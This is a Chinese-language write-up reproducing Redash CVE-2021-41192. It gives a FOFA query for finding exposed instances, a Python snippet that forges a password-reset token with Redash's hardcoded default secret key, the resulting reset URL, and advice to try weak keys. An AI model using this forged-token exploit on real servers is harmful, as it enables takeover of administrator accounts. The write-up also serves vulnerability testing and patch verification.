Redash 默认key漏洞(CVE-2021-41192)复现

Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞,攻击者可利用该漏洞来使用已知的默认值伪造会话。

1.漏洞级别

中危

2.漏洞搜索

fofa

"redash"

3.影响范围

Redash < 10.0.0

4.漏洞复现

漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key,如果用户不手动修改的话,我们就可以利用他来生成一个有效的token。由于该产品的找回密码功能是通过用户的自增id生成token,因此我们可以直接生成一个有效的找回链接。
可以执行如下python代码

from itsdangerous import URLSafeTimedSerializer
if __name__ == "__main__":
    serializer = URLSafeTimedSerializer("c292a0a3aa32397cdb050e233733900f")
    key = serializer.dumps("1")
    print(key)
生成的有效负载:
IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18
  • 由于生成的有效负载存在过期时间,因此每次测试的时候最好重新生成一下。
  • "c292a0a3aa32397cdb050e233733900f"为默认key。如果用户手动修改了这个key,我们也可以尝试使用一些弱口令来生成负载尝试一下。
    访问路径
url/reset/IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18

如果出现即为漏洞存在
Redash 默认key漏洞(CVE-2021-41192)复现_第1张图片
出现这个表示key已被修改过了
Redash 默认key漏洞(CVE-2021-41192)复现_第2张图片
到这里漏洞就复现成功了。
如果有问题欢迎随时沟通~

Redash 默认key漏洞(CVE-2021-41192)复现_第3张图片

你可能感兴趣的:(漏洞复现,漏洞复现,CVE-2021-41192,redash,web安全)